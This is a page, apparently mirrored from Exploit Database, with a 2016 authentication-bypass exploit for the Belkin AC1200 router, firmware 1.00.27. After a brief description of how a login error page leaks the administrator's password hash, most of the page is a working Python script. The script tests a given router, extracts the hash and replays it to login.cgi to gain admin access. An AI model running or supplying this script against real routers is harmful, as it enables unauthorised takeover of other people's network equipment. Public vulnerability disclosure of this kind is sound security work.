Belkin AC1200 Router Firmware 1.00.27 – Authentication Bypass

• Exploit Database
• 14 阅读

• 作者： Gregory Smiley
  日期： 2016-07-11
• 类别：

  • webapps
  平台：

  • cgi
• 来源：https://www.exploit-db.com/exploits/40081/

• '''
  # Exploit Title: Belkin Router AC1200, Firmware: 1.00.27 - Authentication Bypass
  # Date: 5/11/2016
  # Exploit Author: Gregory Smiley
  # Contact: gsx0r.sec@gmail.com
  # Vendor Homepage: http://www.belkin.com
  # Version: Firmware: 1.00.27
  # Tested on:F9K1113 v1
  
  
  #1. Description:
  
  #The Belkin AC1200 is vulnerable to authentication bypass due to it performing client side
  #authentication after you attempt to login after already having failed a login. That webpage, loginpserr.stm contains the md5 hash value of the administrators password. This can be
  #exploited by extracting that hash value, and passing it in the pws field in a post request to
  #login.cgi.
  
  #I would like to note that I contacted Belkin on several occasions
  #and gave them plenty of time to reply/fix the issue before releasing this entry.
  
  
  
  #2. Proof:
  
  #Line 55 of loginpserr.stm contains the javascript code:
  
  #var password = "md5hashofpassword";
  
  
  #3. Exploit:
  '''
  
  #!/usr/bin/python
  
  
  import urllib
  
  import urllib2
  
  import sys
  
  
  router = raw_input('Enter IP address of your AC1200 to test: ')
  
  page = urllib2.urlopen('http://'+router+'/loginpserr.stm').read()
  
  test_page = page
  
  
  vuln_string = 'var password = "'
  
  if vuln_string in test_page:
  
  	print 'Router is vulnerable.'
  	answer = raw_input('Would you like to exploit the target? Y/N : ')
  
  
  else:
  
  
  	print 'Router is not vulnerable.'
  	print 'exiting...'
  
  sys.exit()
  
  
  if (answer == 'y') or (answer == 'Y'):
  
  
  	extract = test_page.split(vuln_string, 1)[1] #These two lines extract the leaked hash value
  	_hash = extract.partition('"')[0] #from /loginpserr.stm using quotes as a delimiter
  
  
  else:
  
  
  	if (answer == 'n') or (answer == 'N'):
  		print 'exiting...'
  
  sys.exit()
  
  
  #Assemble the POST request to /login.cgi
  
  
  
  headers = {
  
  
  'Host': router,
  
  'Connection': 'keep-alive',
  
  'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0',
  
  'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
  
  'Accept-Language' : 'en-US,en;q=0.5',
  
  'Accept-Encoding' : 'gzip, deflate',
  
  'Referer' : 'http://'+router+'/',
  
  'Connection': 'keep-alive',
  
  'Content-Type': 'application/x-www-form-urlencoded'
  
  }
  
  
  data = {
  
  
  
  'totalMSec':'0',
  
  'pws': _hash,
  
  'url':'status.stm',
  
  'arc_action':'login',
  
  'pws_temp': ''
  
  }
  
  
  data = urllib.urlencode(data)
  
  
  #Sends the POST request with the hash in the pws field
  
  
  req = urllib2.Request('http://'+router+'/login.cgi', data, headers)
  
  
  response = urllib2.urlopen(req)
  
  the_page = response.read()
  
  
  print 'Exploit successful.'
  
  print 'You are now free to navigate to http://'+router+'/ ...as admin ;)'